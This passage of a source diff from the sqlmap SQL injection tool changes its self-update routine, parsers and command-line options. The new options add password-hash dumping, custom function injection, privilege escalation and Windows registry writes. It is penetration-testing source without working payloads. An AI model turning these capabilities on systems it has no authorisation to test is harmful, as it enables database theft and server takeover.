+    infoMsg += "subversion repository"
+    logger.info(infoMsg)
 
     try:
-        sqlmapNewestVersion, _ = Request.getPage(url=SQLMAP_VERSION_URL, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(SQLMAP_VERSION_URL)
-        __sqlmapHostname = __sqlmapPath[1]
+        import pysvn
 
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    sqlmapNewestVersion = str(sqlmapNewestVersion).replace("\n", "")
-
-    if not re.search("^([\w\.\-]+)$", sqlmapNewestVersion):
-        errMsg = "sqlmap version is in a wrong syntax"
-        logger.error(errMsg)
-
-        return
-
-    if sqlmapNewestVersion == VERSION:
-        infoMsg = "you are already running sqlmap latest stable version"
-        logger.info(infoMsg)
-
-        return
-
-    elif sqlmapNewestVersion > VERSION:
-        infoMsg  = "sqlmap latest stable version is %s. " % sqlmapNewestVersion
-        infoMsg += "Going to download it from the SourceForge File List page"
-        logger.info(infoMsg)
-
-    elif sqlmapNewestVersion < VERSION:
-        infoMsg  = "you are running a version of sqlmap more updated than "
-        infoMsg += "the latest stable version (%s)" % sqlmapNewestVersion
-        logger.info(infoMsg)
-
-        return
-
-    sqlmapBinaryStringUrl = SQLMAP_SOURCE_URL % sqlmapNewestVersion
-
-    try:
-        sqlmapBinaryString, _ = Request.getPage(url=sqlmapBinaryStringUrl, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(sqlmapBinaryStringUrl)
-        __sqlmapHostname = __sqlmapPath[1]
-
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    debugMsg  = 'saving the sqlmap compressed source to a ZIP file into '
-    debugMsg += 'the temporary directory and extract it'
+        debugMsg = "sqlmap will update itself using installed python-svn "
+        debugMsg += "third-party library, http://pysvn.tigris.org/"
         logger.debug(debugMsg)
 
-    tempDir = tempfile.gettempdir()
-    zipFile = os.path.join(tempDir, "sqlmap-%s.zip" % sqlmapNewestVersion)
-    __createFile(zipFile, sqlmapBinaryString)
-    __extractZipFile(tempDir, zipFile, sqlmapNewestVersion)
+        def notify(event_dict):
+            action = str(event_dict['action'])
+            index = action.find('_')
+            prefix = action[index + 1].upper() if index != -1 else action.capitalize()
 
-    # For each file and directory in the temporary directory copy it
-    # to the sqlmap root path and set right permission
-    # TODO: remove files not needed anymore and all pyc within the
-    # sqlmap root path in the end
-    for root, dirs, files in os.walk(os.path.join(tempDir, "sqlmap-%s" % sqlmapNewestVersion)):
-        # Just for development release
-        if '.svn' in root:
-            continue
+            if action.find('_update') != -1:
+                return
 
-        cleanRoot = root.replace(tempDir, "")
-        cleanRoot = cleanRoot.replace("%ssqlmap-%s" % (os.sep, sqlmapNewestVersion), "")
-
-        if cleanRoot.startswith(os.sep):
-            cleanRoot = cleanRoot[1:]
-
-        for f in files:
-            # Just for development release
-            if f.endswith(".pyc") or f.endswith(".pyo"):
-                continue
-
-            srcFile = os.path.join(root, f)
-            dstFile = os.path.join(paths.SQLMAP_ROOT_PATH, os.path.join(cleanRoot, f))
-
-            if f == "sqlmap.conf" and os.path.exists(dstFile):
-                infoMsg = "backupping configuration file to '%s.bak'" % dstFile
-                logger.info(infoMsg)
-                shutil.move(dstFile, "%s.bak" % dstFile)
-
-            if os.path.exists(dstFile):
-                debugMsg = "replacing file '%s'" % dstFile
+            if action.find('_completed') == -1:
+                print "%s\t%s" % (prefix, event_dict['path'])
             else:
-                debugMsg = "creating new file '%s'" % dstFile
+                revision = str(event_dict['revision'])
+                index = revision.find('number ')
 
+                if index != -1:
+                    revision = revision[index+7:].strip('>')
+
+                logger.info('updated to the latest revision %s' % revision)
+
+        client = pysvn.Client()
+        client.callback_notify = notify
+        client.update(rootDir)
+    except ImportError, _:
+        debugMsg = "sqlmap will try to update itself using 'svn' command"
         logger.debug(debugMsg)
 
-            mkpath(os.path.dirname(dstFile))
-            shutil.copy(srcFile, dstFile)
+        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
 
-            if f.endswith(".py"):
-                os.chmod(dstFile, 0755)
-
-    infoMsg = "sqlmap updated successfully"
-    logger.info(infoMsg)
+        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
+        pollProcess(process)
+        svnStdout, svnStderr = process.communicate()
 
+        if svnStderr:
+            errMsg = svnStderr.strip()
+            logger.error(errMsg)
+        elif svnStdout:
+            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
+            if revision:
+                logger.info('updated to the latest revision %s' % revision.group(1))
 
 def update():
     if not conf.updateAll:

lib/parse/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/banner.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from xml.sax import parse
@@ -35,7 +33,6 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.parse.handler import FingerprintHandler
 
-
 class MSSQLBannerHandler(ContentHandler):
     """
     This class defines methods to parse and extract information from the
@@ -48,10 +45,10 @@ class MSSQLBannerHandler(ContentHandler):
         self.__inServicePack = False
         self.__release       = None
         self.__version       = ""
+        self.__versionAlt    = None
         self.__servicePack   = ""
         self.__info          = info
 
-
     def __feedInfo(self, key, value):
         value = sanitizeStr(value)
 
@@ -60,7 +57,6 @@ class MSSQLBannerHandler(ContentHandler):
 
         self.__info[key] = value
 
-
     def startElement(self, name, attrs):
         if name == "signatures":
             self.__release = sanitizeStr(attrs.get("release"))
@@ -71,34 +67,36 @@ class MSSQLBannerHandler(ContentHandler):
         elif name == "servicepack":
             self.__inServicePack = True
 
-
     def characters(self, data):
         if self.__inVersion:
             self.__version += sanitizeStr(data)
         elif self.__inServicePack:
             self.__servicePack += sanitizeStr(data)
 
-
     def endElement(self, name):
         if name == "signature":
-            if re.search(" %s[\.\ ]+" % self.__version, self.__banner):
+            for version in (self.__version, self.__versionAlt):
+                if version and re.search(" %s[\.\ ]+" % version, self.__banner):
                     self.__feedInfo("dbmsRelease", self.__release)
                     self.__feedInfo("dbmsVersion", self.__version)
                     self.__feedInfo("dbmsServicePack", self.__servicePack)
+                    break
 
             self.__version     = ""
+            self.__versionAlt  = None
             self.__servicePack = ""
 
-
         elif name == "version":
             self.__inVersion = False
             self.__version = self.__version.replace(" ", "")
             
+            match = re.search(r"\A(?P<major>\d+)\.00\.(?P<build>\d+)\Z", self.__version)
+            self.__versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None
+
         elif name == "servicepack":
             self.__inServicePack = False
             self.__servicePack = self.__servicePack.replace(" ", "")
 
-
 def bannerParser(banner):
     """
     This function calls a class to extract information from the given

lib/parse/cmdline.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import sys
 
 from optparse import OptionError
@@ -33,7 +31,6 @@ from optparse import OptionParser
 from lib.core.data import logger
 from lib.core.settings import VERSION_STRING
 
-
 def cmdLineParser():
     """
     This function parses the command line parameters and arguments
@@ -54,7 +51,10 @@ def cmdLineParser():
         target.add_option("-u", "--url", dest="url", help="Target url")
 
         target.add_option("-l", dest="list", help="Parse targets from Burp "
-                          "or WebScarab logs")
+                          "or WebScarab proxy logs")
+
+        target.add_option("-r", dest="requestFile",
+                          help="Load HTTP request from a file")
 
         target.add_option("-g", dest="googleDork",
                           help="Process Google dork results as target urls")
@@ -62,7 +62,6 @@ def cmdLineParser():
         target.add_option("-c", dest="configFile",
                           help="Load options from a configuration INI file")
 
-
         # Request options
         request = OptionGroup(parser, "Request", "These options can be used "
                               "to specify how to connect to the target url.")
@@ -76,8 +75,13 @@ def cmdLineParser():
         request.add_option("--cookie", dest="cookie",
                            help="HTTP Cookie header")
 
-        request.add_option("--referer", dest="referer",
-                           help="HTTP Referer header")
+        request.add_option("--cookie-urlencode", dest="cookieUrlencode",
+                             action="store_true",
+                             help="URL Encode generated cookie injections")
+
+        request.add_option("--drop-set-cookie", dest="dropSetCookie",
+                           action="store_true",
+                           help="Ignore Set-Cookie header from response")
 
         request.add_option("--user-agent", dest="agent",
                            help="HTTP User-Agent header")
@@ -86,20 +90,31 @@ def cmdLineParser():
                            help="Load a random HTTP User-Agent "
                                 "header from file")
 
+        request.add_option("--referer", dest="referer",
+                           help="HTTP Referer header")
+
         request.add_option("--headers", dest="headers",
                            help="Extra HTTP headers newline separated")
 
         request.add_option("--auth-type", dest="aType",
-                           help="HTTP Authentication type (value "
-                                "Basic or Digest)")
+                           help="HTTP authentication type "
+                                "(Basic, Digest or NTLM)")
 
         request.add_option("--auth-cred", dest="aCred",
-                           help="HTTP Authentication credentials (value "
-                                "name:password)")
+                           help="HTTP authentication credentials "
+                                "(name:password)")
+                                
+        request.add_option("--auth-cert", dest="aCert",
+                           help="HTTP authentication certificate ("
+                                "key_file,cert_file)")
 
         request.add_option("--proxy", dest="proxy",
                            help="Use a HTTP proxy to connect to the target url")
 
+        request.add_option("--ignore-proxy", dest="ignoreProxy",
+                            action="store_true",
+                           help="Ignore system default HTTP proxy")
+
         request.add_option("--threads", dest="threads", type="int", default=1,
                            help="Maximum number of concurrent HTTP "
                                 "requests (default 1)")
@@ -115,6 +130,8 @@ def cmdLineParser():
                            help="Retries when the connection timeouts "
                                 "(default 3)")
 
+        request.add_option("--scope", dest="scope", 
+                           help="Regexp to filter targets from provided proxy log")
 
         # Injection options
         injection = OptionGroup(parser, "Injection", "These options can be "
@@ -156,7 +173,6 @@ def cmdLineParser():
                              help="Matches to be excluded before "
                                   "comparing page contents")
 
-
         # Techniques options
         techniques = OptionGroup(parser, "Techniques", "These options can "
                                  "be used to test for specific SQL injection "
@@ -191,7 +207,6 @@ def cmdLineParser():
                                    "to retrieve the queries output. No "
                                    "need to go blind")
 
-
         # Fingerprint options
         fingerprint = OptionGroup(parser, "Fingerprint")
 
@@ -199,7 +214,6 @@ def cmdLineParser():
                                action="store_true",
                                help="Perform an extensive DBMS version fingerprint")
 
-
         # Enumeration options
         enumeration = OptionGroup(parser, "Enumeration", "These options can "
                                   "be used to enumerate the back-end database "
@@ -227,25 +241,23 @@ def cmdLineParser():
 
         enumeration.add_option("--passwords", dest="getPasswordHashes",
                                action="store_true",
-                               help="Enumerate DBMS users password hashes (opt -U)")
+                               help="Enumerate DBMS users password hashes")
 
         enumeration.add_option("--privileges", dest="getPrivileges",
                                action="store_true",
-                               help="Enumerate DBMS users privileges (opt -U)")
+                               help="Enumerate DBMS users privileges")
 
         enumeration.add_option("--dbs", dest="getDbs", action="store_true",
                                help="Enumerate DBMS databases")
 
         enumeration.add_option("--tables", dest="getTables", action="store_true",
-                               help="Enumerate DBMS database tables (opt -D)")
+                               help="Enumerate DBMS database tables")
 
         enumeration.add_option("--columns", dest="getColumns", action="store_true",
-                               help="Enumerate DBMS database table columns "
-                                    "(req -T opt -D)")
+                               help="Enumerate DBMS database table columns")
 
         enumeration.add_option("--dump", dest="dumpTable", action="store_true",
-                               help="Dump DBMS database table entries "
-                                    "(req -T, opt -D, -C, --start, --stop)")
+                               help="Dump DBMS database table entries")
 
         enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
                                help="Dump all DBMS databases tables entries")
@@ -268,10 +280,16 @@ def cmdLineParser():
                                     "enumerating tables")
 
         enumeration.add_option("--start", dest="limitStart", type="int",
-                               help="First table entry to dump")
+                               help="First query output entry to retrieve")
 
         enumeration.add_option("--stop", dest="limitStop", type="int",
-                               help="Last table entry to dump")
+                               help="Last query output entry to retrieve")
+
+        enumeration.add_option("--first", dest="firstChar", type="int",
+                               help="First query output word character to retrieve")
+
+        enumeration.add_option("--last", dest="lastChar", type="int",
+                               help="Last query output word character to retrieve")
 
         enumeration.add_option("--sql-query", dest="query",
                                help="SQL statement to be executed")
@@ -280,6 +298,16 @@ def cmdLineParser():
                                action="store_true",
                                help="Prompt for an interactive SQL shell")
 
+        # User-defined function options
+        udf = OptionGroup(parser, "User-defined function injection", "These "
+                          "options can be used to create custom user-defined "
+                          "functions.")
+
+        udf.add_option("--udf-inject", dest="udfInject", action="store_true",
+                       help="Inject custom user-defined functions")
+
+        udf.add_option("--shared-lib", dest="shLib",
+                       help="Local path of the shared library")
 
         # File system options
         filesystem = OptionGroup(parser, "File system access", "These options "
@@ -299,8 +327,8 @@ def cmdLineParser():
                                    "write to")
 
         # Takeover options
-        takeover = OptionGroup(parser, "Operating system access", "This "
-                               "option can be used to access the back-end "
+        takeover = OptionGroup(parser, "Operating system access", "These "
+                               "options can be used to access the back-end "
                                "database management system underlying "
                                "operating system.")
 
@@ -324,8 +352,7 @@ def cmdLineParser():
                                  "exploitation")
 
         takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
-                            help="User priv escalation by abusing Windows "
-                                 "access tokens")
+                            help="Database process' user privilege escalation")
 
         takeover.add_option("--msf-path", dest="msfPath",
                             help="Local path where Metasploit Framework 3 "
@@ -335,19 +362,52 @@ def cmdLineParser():
                             help="Remote absolute path of temporary files "
                                  "directory")
 
+        # Windows registry options
+        windows = OptionGroup(parser, "Windows registry access", "These "
+                               "options can be used to access the back-end "
+                               "database management system Windows "
+                               "registry.")
+
+        windows.add_option("--reg-read", dest="regRead", action="store_true",
+                            help="Read a Windows registry key value")
+
+        windows.add_option("--reg-add", dest="regAdd", action="store_true",
+                            help="Write a Windows registry key value data")
+
+        windows.add_option("--reg-del", dest="regDel", action="store_true",
+                            help="Delete a Windows registry key value")
+
+        windows.add_option("--reg-key", dest="regKey",
+                            help="Windows registry key")
+
+        windows.add_option("--reg-value", dest="regVal",
+                            help="Windows registry key value")
+
+        windows.add_option("--reg-data", dest="regData",
+                            help="Windows registry key value data")
+
+        windows.add_option("--reg-type", dest="regType",
+                            help="Windows registry key value type")
+
         # Miscellaneous options
         miscellaneous = OptionGroup(parser, "Miscellaneous")
 
+        miscellaneous.add_option("-s", dest="sessionFile",
+                                 help="Save and resume all data retrieved "
+                                      "on a session file")
+                                      
+        miscellaneous.add_option("--flush-session", dest="flushSession", action="store_true",
+                                 help="Flush session file for current target")
+                                      
         miscellaneous.add_option("--eta", dest="eta", action="store_true",
                                  help="Display for each output the "
                                       "estimated time of arrival")
 
-        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
-                                help="Update sqlmap to the latest stable version")
+        miscellaneous.add_option("--gpage", dest="googlePage", type="int",
+                                 help="Use google dork results from specified page number")
 
-        miscellaneous.add_option("-s", dest="sessionFile",
-                                 help="Save and resume all data retrieved "
-                                      "on a session file")
+        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
+                                  help="Update sqlmap")
 
         miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
                                  help="Save options on a configuration INI file")
@@ -365,14 +425,16 @@ def cmdLineParser():
         parser.add_option_group(techniques)
         parser.add_option_group(fingerprint)
         parser.add_option_group(enumeration)
+        parser.add_option_group(udf)
         parser.add_option_group(filesystem)
         parser.add_option_group(takeover)
+        parser.add_option_group(windows)
         parser.add_option_group(miscellaneous)
 
         (args, _) = parser.parse_args()
 
-        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.updateAll:
-            errMsg  = "missing a mandatory parameter ('-u', '-l', '-g', '-c' or '--update'), "
+        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.requestFile and not args.updateAll:
+            errMsg  = "missing a mandatory parameter ('-u', '-l', '-r', '-g', '-c' or '--update'), "
             errMsg += "-h for help"
             parser.error(errMsg)
 

lib/parse/configfile.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from ConfigParser import NoSectionError
 from ConfigParser import ConfigParser
 
@@ -33,10 +31,8 @@ from lib.core.data import logger
 from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.optiondict import optDict
 
-
 config = None
 
-
 def configFileProxy(section, option, boolean=False, integer=False):
     """
     Parse configuration file and save settings into the configuration
@@ -63,7 +59,6 @@ def configFileProxy(section, option, boolean=False, integer=False):
         debugMsg += "ignoring. Skipping to next."
         logger.debug(debugMsg)
 
-
 def configFileParser(configFile):
     """
     Parse configuration file and save settings into the configuration

lib/parse/handler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,15 +22,9 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
-
 from xml.sax.handler import ContentHandler
-
 from lib.core.common import sanitizeStr
-from lib.core.data import kb
-
 
 class FingerprintHandler(ContentHandler):
     """
@@ -46,7 +40,6 @@ class FingerprintHandler(ContentHandler):
         self.__techVersion = None
         self.__info        = info
 
-
     def __feedInfo(self, key, value):
         value = sanitizeStr(value)
 
@@ -62,7 +55,6 @@ class FingerprintHandler(ContentHandler):
             for v in value.split("|"):
                 self.__info[key].add(v)
 
-
     def startElement(self, name, attrs):
         if name == "regexp":
             self.__regexp = sanitizeStr(attrs.get("value"))

lib/parse/headers.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,9 +22,7 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
-import re
+import os
 
 from xml.sax import parse
 
@@ -33,7 +31,6 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.parse.handler import FingerprintHandler
 
-
 def headersParser(headers):
     """
     This function calls a class that parses the input HTTP headers to
@@ -48,13 +45,13 @@ def headersParser(headers):
     kb.headersCount += 1
 
     topHeaders = {
-                   "cookie":                          "%s/cookie.xml" % paths.SQLMAP_XML_BANNER_PATH,
-                   "microsoftsharepointteamservices": "%s/sharepoint.xml" % paths.SQLMAP_XML_BANNER_PATH,
-                   "server":                          "%s/server.xml" % paths.SQLMAP_XML_BANNER_PATH,
-                   "servlet-engine":                  "%s/servlet.xml" % paths.SQLMAP_XML_BANNER_PATH,
-                   "set-cookie":                      "%s/cookie.xml" % paths.SQLMAP_XML_BANNER_PATH,
-                   "x-aspnet-version":                "%s/x-aspnet-version.xml" % paths.SQLMAP_XML_BANNER_PATH,
-                   "x-powered-by":                    "%s/x-powered-by.xml" % paths.SQLMAP_XML_BANNER_PATH,
+                   "cookie":                          os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
+                   "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
+                   "server":                          os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
+                   "servlet-engine":                  os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
+                   "set-cookie":                      os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
+                   "x-aspnet-version":                os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
+                   "x-powered-by":                    os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml")
                  }
 
     for header in headers:

lib/parse/html.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from xml.sax import parse
@@ -34,7 +32,6 @@ from lib.core.common import sanitizeStr
 from lib.core.data import kb
 from lib.core.data import paths
 
-
 class htmlHandler(ContentHandler):
     """
     This class defines methods to parse the input HTML page to
@@ -49,7 +46,6 @@ class htmlHandler(ContentHandler):
 
         self.dbms     = None
 
-
     def startElement(self, name, attrs):
         if name == "dbms":
             self.__dbms = attrs.get("value")
@@ -62,7 +58,6 @@ class htmlHandler(ContentHandler):
                 self.dbms = self.__dbms
                 self.__match = None
 
-
 def htmlParser(page):
     """
     This function calls a class that parses the input HTML page to

lib/parse/queriesfile.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from xml.sax import parse
 from xml.sax.handler import ContentHandler
 
@@ -34,7 +32,6 @@ from lib.core.data import queries
 from lib.core.data import paths
 from lib.core.datatype import advancedDict
 
-
 class queriesHandler(ContentHandler):
     """
     This class defines methods to parse the default DBMS queries
@@ -45,7 +42,6 @@ class queriesHandler(ContentHandler):
         self.__dbms    = ''
         self.__queries = advancedDict()
 
-
     def startElement(self, name, attrs):
         if name == "dbms":
             data = sanitizeStr(attrs.get("value"))
@@ -134,18 +130,23 @@ class queriesHandler(ContentHandler):
             data = sanitizeStr(attrs.get("query"))
             self.__queries.isDba = data
 
+        elif name == "check_udf":
+            data = sanitizeStr(attrs.get("query"))
+            self.__queries.checkUdf = data
+
         elif name == "inband":
             self.__inband    = sanitizeStr(attrs.get("query"))
             self.__inband2   = sanitizeStr(attrs.get("query2"))
-            self.__condition = sanitizeStr(attrs.get("condition"))
-            self.__condition2 = sanitizeStr(attrs.get("condition2"))
+            self.__conditionInband = sanitizeStr(attrs.get("condition"))
+            self.__conditionInband2 = sanitizeStr(attrs.get("condition2"))
 
         elif name == "blind":
             self.__blind  = sanitizeStr(attrs.get("query"))
             self.__blind2 = sanitizeStr(attrs.get("query2"))
             self.__count  = sanitizeStr(attrs.get("count"))
             self.__count2 = sanitizeStr(attrs.get("count2"))
-
+            self.__conditionBlind = sanitizeStr(attrs.get("condition"))
+            self.__conditionBlind2 = sanitizeStr(attrs.get("condition2"))
 
     def endElement(self, name):
         if name == "dbms":
@@ -162,7 +163,7 @@ class queriesHandler(ContentHandler):
 
         elif name == "passwords":
             self.__passwords = {}
-            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition }
+            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband }
             self.__passwords["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                            "count": self.__count, "count2": self.__count2 }
 
@@ -170,7 +171,7 @@ class queriesHandler(ContentHandler):
 
         elif name == "privileges":
             self.__privileges = {}
-            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition, "condition2": self.__condition2 }
+            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
             self.__privileges["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                            "count": self.__count, "count2": self.__count2 }
 
@@ -186,18 +187,25 @@ class queriesHandler(ContentHandler):
 
         elif name == "tables":
             self.__tables = {}
-            self.__tables["inband"] = { "query": self.__inband, "condition": self.__condition }
+            self.__tables["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
             self.__tables["blind"]  = { "query": self.__blind, "count": self.__count }
 
             self.__queries.tables = self.__tables
 
         elif name == "columns":
             self.__columns = {}
-            self.__columns["inband"] = { "query": self.__inband }
-            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count }
+            self.__columns["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
+            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "condition": self.__conditionBlind }
 
             self.__queries.columns = self.__columns
 
+        elif name == "dump_column":
+            self.__dumpColumn = {}
+            self.__dumpColumn["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
+            self.__dumpColumn["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "count2": self.__count2, "condition": self.__conditionBlind, "condition2": self.__conditionBlind2 }
+
+            self.__queries.dumpColumn = self.__dumpColumn
+
         elif name == "dump_table":
             self.__dumpTable = {}
             self.__dumpTable["inband"] = { "query": self.__inband }
@@ -205,7 +213,6 @@ class queriesHandler(ContentHandler):
 
             self.__queries.dumpTable = self.__dumpTable
 
-
 def queriesParser():
     """
     This function calls a class to parse the default DBMS queries

lib/request/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under